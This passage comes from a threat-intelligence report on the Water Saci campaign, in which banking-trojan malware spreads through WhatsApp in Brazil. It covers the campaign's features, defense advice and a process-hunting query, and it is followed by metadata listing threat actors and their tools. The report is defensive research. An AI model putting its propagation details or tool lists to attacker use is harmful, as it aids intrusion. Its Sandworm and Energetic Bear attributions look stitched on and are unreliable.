sending\r\nIndividual\r\nonly\r\nIndividual + batch mode Faster spreading\r\nHeadless mode Supported Supported (enhanced) Stealth operation\r\nContact filtering Basic Enhanced (@lid filtering) Better targeting\r\nTable 7. improvements to the Python variant compared to PowerShell variant\r\nConclusion\r\nThe Water Saci campaign exemplifies a new era of cyber threats in Brazil, where attackers exploit the trust and\r\nreach of popular messaging platforms like WhatsApp to orchestrate large-scale, self-propagating malware\r\ncampaigns. By weaponizing familiar communication channels and employing advanced social engineering, threat\r\nactors are able to swiftly compromise victims, bypass traditional defenses, and sustain persistent banking trojan\r\ninfections. This campaign demonstrates how legitimate platforms can be transformed into powerful vectors for\r\nmalware delivery and underscores the growing sophistication of cybercriminal operations in the region.\r\nThe campaign’s multi-stage infection chain – spanning malicious HTA files, MSI installers, and advanced Python-based automation – underscores the increasing complexity of today’s threats. Notably, the integration of\r\npropagation automation via WhatsApp, anti-analysis measures, and robust persistence mechanisms enables\r\nattackers to maximize reach while evading detection and maintaining long-term access to compromised systems.\r\nThis analysis highlights the urgent need for organizations and individuals to adopt a multi-layered security\r\napproach. Proactive measures such as disabling auto-downloads in messaging applications, restricting file\r\ntransfers, enhancing user awareness, and deploying advanced endpoint security solutions are crucial in defending\r\nagainst sophisticated, script-based threats like Water Saci.\r\nAs attackers continue to innovate, leveraging both technical and social vectors, it is imperative to combine robust\r\ntechnology with continuous education and vigilant security practices. Trend Micro remains committed to\r\nmonitoring these evolving threats, providing actionable intelligence, and empowering organizations to stay ahead\r\nof the adversaries.\r\nDefense recommendations \r\nTo minimize the risks associated with the Water Saci campaign, Trend recommends several practical initial\r\ndefense items:  \r\nDisable auto-downloads on WhatsApp. Turn off automatic downloads of media and documents in\r\nWhatsApp settings to reduce accidental exposure to malicious files.  \r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 28 of 29\n\nControl file transfers on personal apps. Use endpoint security or firewall policies to block or restrict file\r\ntransfers through personal applications like WhatsApp, Telegram, or WeTransfer on company-managed\r\ndevices. If your organization supports BYOD, enforce strict app whitelisting or containerization to protect\r\nsensitive environments.  \r\nEnhance user awareness. The victimology of the Water Saci campaign suggests that attackers are targeting\r\nenterprises. Regular security training helps an organization’s employees recognize the dangers of\r\ndownloading files via messaging platforms. Advise users to avoid clicking on unexpected attachments or\r\nsuspicious links, even when they come from known contacts, and promote the use of secure, approved\r\nchannels for transferring business documents.  \r\nEnhance email and communication security controls. Restrict access to personal email and messaging apps\r\non corporate devices. Use web and email gateways with URL filtering to block known malicious C\u0026C and\r\nphishing domains. \r\nEnforce multi-factor authentication (MFA) and session hygiene. Require MFA for all cloud and web\r\nservices to prevent session hijacking. Advise users to log out after using messaging apps and regularly\r\nclear browser cookies and tokens. \r\nDeploy advanced endpoint security solutions. Use Trend’s endpoint security platforms (such as Trend\r\nMicro Apex One™ or Vision One) to detect and block suspicious script-based attacks, fileless malware,\r\nand automation abuse. Enable behavioral monitoring to catch unauthorized VBS/PowerShell execution,\r\nbrowser profile alterations, and lateral movement attempts related to WhatsApp and similar threats. \r\nImplementing these recommendations will help organizations and individuals better defend against malware\r\nthreats delivered through messaging applications.\r\nHunting Queries  \r\nTrend Vision One Search App  \r\nTrend Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this\r\nblog post with data in their environment. \r\nDetect process creation events where a randomly named .exe executes a randomly named .log file.\r\neventSubId:2 AND processCmd:/[A-Za-z0-9]{6,}\\.exe [A-Za-z0-9]{6,}\\.log/\r\nIndicators of Compromise (IoCs)\r\nThe indicators of compromise for this entry can be found here.\r\nSource: https://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 29 of 29\n\n https://www.trendmicro.com/en_us/research/25/l/water-saci.html \nFigure 15. Create suspended process and allocate memory\nFigure 16. Alternate fallback base addresses \n Page 13 of 29", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://www.trendmicro.com/en_us/research/25/l/water-saci.html" ], "report_names": [ "water-saci.html" ], "threat_actors": [ { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "d11b4ce0-97fd-4f61-8186-40e8c390d5d3", "created_at": "2026-01-18T02:00:03.069539Z", "updated_at": "2026-04-10T02:00:03.908186Z", "deleted_at": null, "main_name": "Water Saci", "aliases": [], "source_name": "MISPGALAXY:Water Saci", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434402, "ts_updated_at": 1775792228, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/6bfa827f98bc9fb1d5d7e6436f53687eb41cde1e.pdf", "text": "https://archive.orkl.eu/6bfa827f98bc9fb1d5d7e6436f53687eb41cde1e.txt", "img": "https://archive.orkl.eu/6bfa827f98bc9fb1d5d7e6436f53687eb41cde1e.jpg" } }